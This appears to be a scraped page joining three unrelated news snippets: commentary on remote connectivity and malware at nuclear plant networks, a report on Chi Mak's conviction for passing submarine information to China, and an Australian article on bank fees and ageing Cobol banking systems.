The prevailing wisdom is that nuclear plants are isolated and not connected or interconnected. At least for some nuclear plants, that is simply not true! I personally know of many nuclear plants with remote connectivity to and from their nuclear plant networks.
One interesting case was mentioned at the Applied Control Solutions Conference in Knoxville last August by a representative from a nuclear utility. He mentioned they installed firewalls between their nuclear plant networks and Corporate network because their nuclear plant networks were infecting the Corporate network with malware, not the other way around.
Chi Mak, who worked for a US company with several Navy contracts, was convicted last May of trying to export intelligence about silent submarines in a plot that involved four members of his family.
Mak, whose age was given as 65 by justice officials, was also fined 50,000 dollars by US District Judge Cormac Carney, who said the lengthy sentence was intended to send a message to China’s intelligence services…
He was found guilty of two counts of attempting to send sensitive material to China, acting as a foreign agent without notifying the US government and making false statements to federal agents.
Banks slugged householders more than $1.6 billion in penalties for failed direct debits, exceeding card limits and late payments on credit cards last year, consumer magazine Choice says, but they have been slow to adopt new technology to prevent errors.
Banking systems and practices will come under scrutiny in a Senate inquiry on the Fair Bank and Credit Card Fees Amendment Bill, introduced by Family First Senator Steve Fielding last year.
"Outrageous bank fees need to be reined in," he said. "Banks have been encouraging people to use electronic transactions, but instead of fees coming down they've gone up."
"The issue is doing away with fees that are totally unfair, and getting the rest back to reasonable cost recovery." Mike Aston, chief executive of real-time payments processing developer Distra, said most banks and credit card firms were still using systems that were 25 to 30 years old, and written in the obsolete Cobol language.